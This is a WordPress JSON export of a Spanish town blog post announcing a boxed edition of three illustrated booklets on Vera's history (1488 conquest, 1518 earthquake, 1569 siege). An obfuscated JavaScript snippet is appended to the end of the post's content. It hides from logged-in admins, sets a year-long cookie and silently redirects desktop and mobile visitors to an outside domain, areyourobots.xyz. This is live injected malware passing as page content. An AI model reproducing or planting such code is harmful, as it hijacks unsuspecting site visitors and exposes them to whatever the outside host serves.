{"id":3547,"date":"2018-04-17T09:52:17","date_gmt":"2018-04-17T09:52:17","guid":{"rendered":"https:\/\/blog.vera.es\/cultura\/?p=3547"},"modified":"2018-04-26T06:44:12","modified_gmt":"2018-04-26T06:44:12","slug":"edicion-de-la-epica-de-un-siglo-1488-1518-1569","status":"publish","type":"post","link":"https:\/\/blog.vera.es\/cultura\/2018\/04\/17\/edicion-de-la-epica-de-un-siglo-1488-1518-1569\/","title":{"rendered":"EDICI\u00d3N DE LA \u00c9PICA DE UN SIGLO 1488-1518-1569"},"content":{"rendered":"<p>Presentaci\u00f3n de la publicaci\u00f3n de <em>Vera. La \u00e9pica de un siglo. 1488-1518-1569.<\/em><\/p>\n<p><!--more--><\/p>\n<p>El s\u00e1bado 14 de abril de este a\u00f1o de 2018 se present\u00f3 en el Convento de la Victoria de Vera la publicaci\u00f3n: <em>Vera. La \u00e9pica de un siglo. 1488-1518-1569<\/em>.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/presentaci\u00f3n-\u00e9pica-de-un-siglo-convento-m\u00ednimos.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-3555\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/presentaci\u00f3n-\u00e9pica-de-un-siglo-convento-m\u00ednimos-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/presentaci\u00f3n-\u00e9pica-de-un-siglo-convento-m\u00ednimos-300x200.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/presentaci\u00f3n-\u00e9pica-de-un-siglo-convento-m\u00ednimos-272x182.jpg 272w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/presentaci\u00f3n-\u00e9pica-de-un-siglo-convento-m\u00ednimos.jpg 470w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Se trata de la recopilaci\u00f3n en una caja de los tres cuadernillos ilustrados que durante estos cinco a\u00f1os de fiestas de Moros y Cristianos de Vera se han ido publicando de manera aislada con el fin de divulgar la historia del Levante Almeriense y de Vera durante el primer siglo de la toma cristiana de sus municipios.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/cubierta-trilog\u00eda-\u00e9pica-de-un-siglo.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-3550\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/cubierta-trilog\u00eda-\u00e9pica-de-un-siglo-300x211.jpg\" alt=\"\" width=\"300\" height=\"211\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/cubierta-trilog\u00eda-\u00e9pica-de-un-siglo-300x211.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/cubierta-trilog\u00eda-\u00e9pica-de-un-siglo-768x539.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/cubierta-trilog\u00eda-\u00e9pica-de-un-siglo-1024x719.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/edici\u00f3n-ayto-vera-\u00e9pica-de-un-siglo.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-3551\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/edici\u00f3n-ayto-vera-\u00e9pica-de-un-siglo-300x81.jpg\" alt=\"\" width=\"300\" height=\"81\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/edici\u00f3n-ayto-vera-\u00e9pica-de-un-siglo-300x81.jpg 300w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/edici\u00f3n-ayto-vera-\u00e9pica-de-un-siglo-768x208.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/edici\u00f3n-ayto-vera-\u00e9pica-de-un-siglo-1024x277.jpg 1024w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/edici\u00f3n-ayto-vera-\u00e9pica-de-un-siglo.jpg 1662w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>La tem\u00e1tica de estos cuadernillos,\u00a0 todos bellamente ilustrados, es la siguiente:<\/p>\n<p>1. <em>La Conquista de Vera y la Axarqu\u00eda Almeriense<\/em>. Relata los acontecimientos que rodearon la toma de Vera por las tropas cristianas en 10-06-1488.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-conquista-vera.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3553\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-conquista-vera-214x300.jpg\" alt=\"\" width=\"214\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-conquista-vera-214x300.jpg 214w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-conquista-vera.jpg 709w\" sizes=\"(max-width: 214px) 100vw, 214px\" \/><\/a><\/p>\n<p>2. <em>El terremoto de 1518. Fin y renacimiento de una ciudad<\/em>. Se describe el cap\u00edtulo del terremoto que asol\u00f3 la ciudad de Vera del Cerro, la Vera vieja, y parcialmente la de Moj\u00e1car, el 09-11-1518.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-terremoto-vera.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3554\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-terremoto-vera-213x300.jpg\" alt=\"\" width=\"213\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-terremoto-vera-213x300.jpg 213w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-terremoto-vera-768x1080.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-terremoto-vera-728x1024.jpg 728w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-terremoto-vera.jpg 945w\" sizes=\"(max-width: 213px) 100vw, 213px\" \/><\/a><\/p>\n<p>3.<em> Vera en Guerra. El origen del d\u00eda de san Cleof\u00e1s<\/em>. Relata el cerco de Ab\u00e9n Humeya a la ciudad de Vera el 25 de septiembre de 1569.<\/p>\n<p><a href=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-ab\u00e9n-humeya.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-3552\" src=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-ab\u00e9n-humeya-213x300.jpg\" alt=\"\" width=\"213\" height=\"300\" srcset=\"https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-ab\u00e9n-humeya-213x300.jpg 213w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-ab\u00e9n-humeya-768x1080.jpg 768w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-ab\u00e9n-humeya-728x1024.jpg 728w, https:\/\/blog.vera.es\/cultura\/wp-content\/uploads\/sites\/2\/2018\/04\/portada-ab\u00e9n-humeya.jpg 945w\" sizes=\"(max-width: 213px) 100vw, 213px\" \/><\/a><\/p>\n<p><strong>Los autores<\/strong> de estos cuadernillos son los siguientes:<\/p>\n<p><strong>-Jos\u00e9 Manuel Ram\u00edrez Hidalgo<\/strong>, Presidente de la Asociaci\u00f3n de Moros y Cristianos de Vera, ilustrador del cuadernillo del terremoto.<\/p>\n<p><strong>-Jos\u00e9 Ram\u00f3n Par\u00eds<\/strong>, ilustrador y dise\u00f1ador general de las tres publicaciones y de la caja decorativa que las une.<\/p>\n<p><strong>-Pedro L\u00f3pez Soler<\/strong>, autor de varios pr\u00f3logos, y<strong> Luisa Mar\u00eda Soler Mart\u00ednez<\/strong>, autora de varios textos hist\u00f3ricos.<\/p>\n<p>Colabora en su publicaci\u00f3n el Excmo. Ayuntamiento de Vera, Concejal\u00eda de Turismo, Cultura y Festejos, la Asociaci\u00f3n de Moros y Cristianos de Vera y la Comisi\u00f3n del V Centenario del Terremoto de Vera.<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.areyourobots.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Presentaci\u00f3n de la publicaci\u00f3n de Vera. La \u00e9pica de un siglo. 1488-1518-1569.<\/p>\n","protected":false},"author":7,"featured_media":3549,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[109],"tags":[283,142,209,281,107,58,44,282],"class_list":["post-3547","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-historia","tag-comision-del-v-centenario-del-terremoto-de-vera","tag-jose-manuel-ramirez-hidalgo","tag-jose-ramon-paris","tag-libros","tag-luisa-maria-soler-martinez","tag-moros-y-cristianos","tag-pedro-lopez-soler","tag-publicaciones"],"_links":{"self":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3547","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/comments?post=3547"}],"version-history":[{"count":4,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3547\/revisions"}],"predecessor-version":[{"id":3572,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/posts\/3547\/revisions\/3572"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media\/3549"}],"wp:attachment":[{"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/media?parent=3547"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/categories?post=3547"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.vera.es\/cultura\/wp-json\/wp\/v2\/tags?post=3547"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}